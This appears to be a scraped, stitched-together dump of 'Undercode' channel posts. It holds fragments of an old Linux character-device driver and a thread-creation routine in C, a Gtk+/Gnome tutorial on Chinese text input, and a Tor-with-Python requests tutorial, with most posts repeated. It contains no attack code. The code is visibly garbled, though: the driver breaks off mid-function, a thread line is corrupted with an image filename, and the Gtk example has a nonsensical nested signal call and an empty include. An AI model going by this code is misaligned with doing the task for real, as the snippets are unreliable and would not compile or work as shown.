***********************************************************************/
/* 1 */
#define KERNEL
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/tty.h>
#include <linux/signal.h>
#include <linux/errno.h>
#include <linux/malloc.h>
#include <asm/io.h>
#include <asm/segment.h>
#include <asm/system.h>
#include <asm/irq.h>
#include "tdd.h"
/* 2 */
static int tdd_trace;
static int write_busy;
static int read_busy;
static struct tdd_buf *qhead;
static struct tdd_buf *qtail;
/* 3 */
static int tdd_read(struct inode *, struct file *, char *, int);
static int tdd_write(struct inode *, struct file *, char *, int);
static int tdd_ioctl(struct inode *, struct file *, unsigned int,
unsigned long);
static int tdd_open(struct inode *, struct file *);
static void tdd_release(struct inode *, struct file *);
extern void console_print(char *);
struct file_operations tdd_fops =
{
NULL,
tdd_read,
tdd_write,
NULL,
NULL,
tdd_ioctl,
NULL,
tdd_open,
tdd_release,
NULL,
NULL,
NULL,
NULL
};
]
init.c
/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
***********************************************************************/
void tdd_init(void)
{
tdd_trace = TRUE;
if (register_chrdev(30, "tdd", &tdd_fops))
TRACE_TXT("Cannot register tdd driver as major device 30")
else
TRACE_TXT("Tiny device driver registered successfully")
--------------------------------------------------------------------------------
newthread
/*******************************************************
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
***********************************************************************/
new_thread(int (*start_addr)(void), int stack_size)
{
struct context *ptr;
int esp;
/* 1 */
if (!(ptr = (struct context *)malloc(sizeof(struct context))))
return 0;
/* 2 */
if (!(ptr->stack = (char *)malloc(stack_size)))
return 0;
/* 3 */
esp = (int)(ptr->stack+(stack_size-4));
*(int *)esp = (int)exit_thread;
*(int *)(esp-4) = (int)start_addr;
*(int *)(esp-icon_cool.gif = esp-4;
ptr->ebp = esp-8;
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTHIS POST IS FOR PRO USERS A preliminary study of using in Gtk+/GnomeI :
development environment and development tools
1๏ธโฃThe desktop environment of the common Linux Contribution is internationalized, as long as you modify some configuration files. Realize the display of Chinese characters. Chinese character input has also followed the XIM standard. As long as the client program accepts XIM, the Chinese characters can be input in theory. The key problem is that not all familiar applications support internationalization, and sometimes even the software itself Support, also need to do some setting work.
2๏ธโฃMy working environment is Mandrake 7.2 and input 3.0 as exmaple recommended to use this old version for Testing
3๏ธโฃ The KDE desktop realizes localization. Generally speaking, my editing tool is Vim. If you want to input arabic characters, you need to have a Terminal that supports XIM, rxvt- CLE is a good choice. I think Gnome-Terminal should obviously be able to achieve Chinese character input and output, but I havenโt got it right now. The main problem is I donโt know where to set the fontset, because only in this way can arabic and English mixed display After two days, look at the original code, it should not be difficult to modify.
4๏ธโฃThe vgraphical editor can use Gedit, and the bluefish I am currently using to write this HTML file. If you want to use your own definition in bluefish Fontset, instead of Gtk+'s default settings, needs to set the fontset variable in ~/.bluefish/rcfile to 1.
5๏ธโฃThe internationalization of software like Netscape has been done very well. After you set the locale and XIM, the input and output are satisfactory. Of course, you may need to set the font in the configuration file.
๐ฆGtk+/Gnome example
/* Use the Chinese example ""base.c"" in gtk+/gnome programming
*
* This code uses gtk+/gnome to generate an editing window, through the system's XIM Server
* Input Chinese characters, the input font uses the definition in this program .
*
* Compilation method:
* gcc -o base base.c ``gnome-config --cflags --libs gnome gtk gnomeui`
*/
#include
/* Macro
* Define your locale at PACKAGE_LOCALE_DIR Location.
* I use Mandrake 7.2, LC_ALL=zh_CN.GB2312
* */
#define PACKAGE ""base""
#define PACKAGE_LOCALE_DIR ""/usr/local/share/locale""
gint delete_event (GtkWidget *widget, GdkEvent *event, gpointer data)
{
g_print(""delete event occerred "");
return(FALSE);
}
void destroy( GtkWidget *widget, gpointer data)
{
gtk_main_quit();
}
int main (int argc, char *argv[])
{
GtkWidget *window;
GtkWidget *text;
/* Variables related to font modification */
GtkStyle *style;
GdkFont *tmpfont;
gchar *fontstring;
/* Set the font to use: Two fonts correspond to English and Chinese respectively.
Modify this sentence according to your Xwindow *, Use fonts recognized by the system.
* Available
* xlsfonts |grep gb
* command to find your Chinese font.
* */
fontstring = ""-*-fixed-medium-r-normal--16-*-*-*- *-*-iso8859-1,-*-simsun-medium-r-normal--16-*-*-*-*-*-gb2312.1980-0"";
/* load locale:
* these two sentences have to*/
bindtextdomain (PACKAGE, PACKAGE_LOCALE_DIR);
textdomain (PACKAGE);
/* Gnome initialization */
gnome_init (PACKAGE, ""0.1"", argc, argv);
window = gtk_window_new (GTK_WINDOW_TOPLEVEL);
gtk_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect)) "",
GTK_SIGNAL_FUNC (delete_event), NULL);
gtk_signal_connect (GTK_OBJECT (window), ""destroy"",
GTK_SIGNAL_FUNC (destroy), NULL);
text = gtk_text_new (NULL, NULL);
/* Set custom font: * /
style = gtk_rc_get_style (GTK_WIDGET(text));
tmpfont = style->font;
if(!(style->font = gdk_fontset_load(fontstring)))
g_print(""fontset_load false "");
gdk_font_unref(tmpfont);
gtk_widget_set_style(GTK_WIDGET(text), style);
gtk_container_add (GTK_CONTAINER (window), text);
gtk_widget_show (text);
gtk_widget_show (window);
gtk_text_set_editable (GTK_TEXT (text), TRUE);
gtk_main ();
return(0);
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTHIS POST IS FOR PRO USERS A preliminary study of using in Gtk+/GnomeI :
development environment and development tools
1๏ธโฃThe desktop environment of the common Linux Contribution is internationalized, as long as you modify some configuration files. Realize the display of Chinese characters. Chinese character input has also followed the XIM standard. As long as the client program accepts XIM, the Chinese characters can be input in theory. The key problem is that not all familiar applications support internationalization, and sometimes even the software itself Support, also need to do some setting work.
2๏ธโฃMy working environment is Mandrake 7.2 and input 3.0 as exmaple recommended to use this old version for Testing
3๏ธโฃ The KDE desktop realizes localization. Generally speaking, my editing tool is Vim. If you want to input arabic characters, you need to have a Terminal that supports XIM, rxvt- CLE is a good choice. I think Gnome-Terminal should obviously be able to achieve Chinese character input and output, but I havenโt got it right now. The main problem is I donโt know where to set the fontset, because only in this way can arabic and English mixed display After two days, look at the original code, it should not be difficult to modify.
4๏ธโฃThe vgraphical editor can use Gedit, and the bluefish I am currently using to write this HTML file. If you want to use your own definition in bluefish Fontset, instead of Gtk+'s default settings, needs to set the fontset variable in ~/.bluefish/rcfile to 1.
5๏ธโฃThe internationalization of software like Netscape has been done very well. After you set the locale and XIM, the input and output are satisfactory. Of course, you may need to set the font in the configuration file.
๐ฆGtk+/Gnome example
/* Use the Chinese example ""base.c"" in gtk+/gnome programming
*
* This code uses gtk+/gnome to generate an editing window, through the system's XIM Server
* Input Chinese characters, the input font uses the definition in this program .
*
* Compilation method:
* gcc -o base base.c ``gnome-config --cflags --libs gnome gtk gnomeui`
*/
#include
/* Macro
* Define your locale at PACKAGE_LOCALE_DIR Location.
* I use Mandrake 7.2, LC_ALL=zh_CN.GB2312
* */
#define PACKAGE ""base""
#define PACKAGE_LOCALE_DIR ""/usr/local/share/locale""
gint delete_event (GtkWidget *widget, GdkEvent *event, gpointer data)
{
g_print(""delete event occerred "");
return(FALSE);
}
void destroy( GtkWidget *widget, gpointer data)
{
gtk_main_quit();
}
int main (int argc, char *argv[])
{
GtkWidget *window;
GtkWidget *text;
/* Variables related to font modification */
GtkStyle *style;
GdkFont *tmpfont;
gchar *fontstring;
/* Set the font to use: Two fonts correspond to English and Chinese respectively.
Modify this sentence according to your Xwindow *, Use fonts recognized by the system.
* Available
* xlsfonts |grep gb
* command to find your Chinese font.
* */
fontstring = ""-*-fixed-medium-r-normal--16-*-*-*- *-*-iso8859-1,-*-simsun-medium-r-normal--16-*-*-*-*-*-gb2312.1980-0"";
/* load locale:
* these two sentences have to*/
bindtextdomain (PACKAGE, PACKAGE_LOCALE_DIR);
textdomain (PACKAGE);
/* Gnome initialization */
gnome_init (PACKAGE, ""0.1"", argc, argv);
window = gtk_window_new (GTK_WINDOW_TOPLEVEL);
gtk_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect (GTK_signal_connect)) "",
GTK_SIGNAL_FUNC (delete_event), NULL);
gtk_signal_connect (GTK_OBJECT (window), ""destroy"",
GTK_SIGNAL_FUNC (destroy), NULL);
text = gtk_text_new (NULL, NULL);
/* Set custom font: * /
style = gtk_rc_get_style (GTK_WIDGET(text));
tmpfont = style->font;
if(!(style->font = gdk_fontset_load(fontstring)))
g_print(""fontset_load false "");
gdk_font_unref(tmpfont);
gtk_widget_set_style(GTK_WIDGET(text), style);
gtk_container_add (GTK_CONTAINER (window), text);
gtk_widget_show (text);
gtk_widget_show (window);
gtk_text_set_editable (GTK_TEXT (text), TRUE);
gtk_main ();
return(0);
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ Using Tor with Python :
1) download https://www.torproject.org/download/tor/
2) Install Python requests
We need Python requests
You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
3) Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
4) Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages โโas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
5) The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ Using Tor with Python :
1) download https://www.torproject.org/download/tor/
2) Install Python requests
We need Python requests
You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
3) Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
4) Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages โโas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
5) The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
www.torproject.org
The Tor Project | Privacy & Freedom Online
Defend yourself against tracking and surveillance. Circumvent censorship.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ Using Tor with Python:
How to use TOR with Python
1) For this tutorial we need Python and PIP
Additionally, we need the TOR expert package.
2) After this tutorial, you should be able to use TOR and Python together.
3) Download Tor
Download and install the TOR expert package on your system
https://www.torproject.org/download/tor/
4) Install Python requests
We need Python requests
5) You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages โโas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐ Using Tor with Python:
How to use TOR with Python
1) For this tutorial we need Python and PIP
Additionally, we need the TOR expert package.
2) After this tutorial, you should be able to use TOR and Python together.
3) Download Tor
Download and install the TOR expert package on your system
https://www.torproject.org/download/tor/
4) Install Python requests
We need Python requests
5) You can install it using the following commands:
pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.
We will use the requests library to execute requests.
Make sure you have TOR running before running the code.
import requests
domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.
Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages โโas well.
use case 1: crawler
You can use this code to create your own Python crawler via TOR.
Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.
myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.
The code allows you to load entire pages without viewing visual content.
This can be a big advantage in some use cases.
my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething
@UndercodeTesting
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
www.torproject.org
The Tor Project | Privacy & Freedom Online
Defend yourself against tracking and surveillance. Circumvent censorship.